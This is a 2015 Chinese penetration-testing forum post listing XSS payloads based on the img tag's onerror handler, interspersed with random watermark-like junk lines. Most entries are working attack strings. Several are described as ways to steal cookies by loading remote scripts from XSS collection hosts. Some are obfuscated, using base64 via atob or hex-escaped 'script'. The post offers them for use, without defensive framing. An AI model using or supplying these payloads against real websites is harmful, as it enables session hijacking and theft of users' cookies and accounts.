中国网络渗透测试联盟
标题:
img标签的常用几种测试手段
[打印本页]
作者:
admin
时间:
2015-10-18 14:33
标题:
img标签的常用几种测试手段
<img src='non-exist.jpg'onerror="alert('xss')">
9 @8 X/ v+ Q6 y% f
<img src=# onerror=alert(123)>
# L6 M$ K+ i8 ]1 ] a
<img src=# onerror=alert(document.cookie)>
- z y7 f4 @4 q0 q" v
下面是利用平台钓cookie的
2 L2 _3 d5 n) ]1 Z! @* y1 V
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
" x0 H6 p( E6 v( N; ]7 t% `) l
0 [% f) B" N; j" J5 ^& j5 Q
; v% _5 t, C+ P7 ]0 ^7 x1 ?
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
% A5 ]/ R$ O1 u
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
5 t4 m3 y' @/ f9 ?
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
4 g& C& x4 c5 y4 l8 S
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
4 J7 u, {6 ]5 _" g t7 l
<img src="#">
, F W3 x6 V ]% _
<img src="#">
+ B9 n, V0 J& J
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
/ Q0 O9 `' K" L: @3 @
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
$ ]9 l8 J) k, V! }0 w
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
! q* o5 F. N x2 J2 T* J) c2 N
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
) i8 S( A" B H
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
* ^7 o7 J+ x; q+ I+ r( R6 R; Q
<img src=x width="0" height="0"></img>
D- N& L6 k W/ B; B
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
" d6 J" P0 K. l$ F# _; R/ p
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
- J: S2 F6 ?" g8 j3 f& ^
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2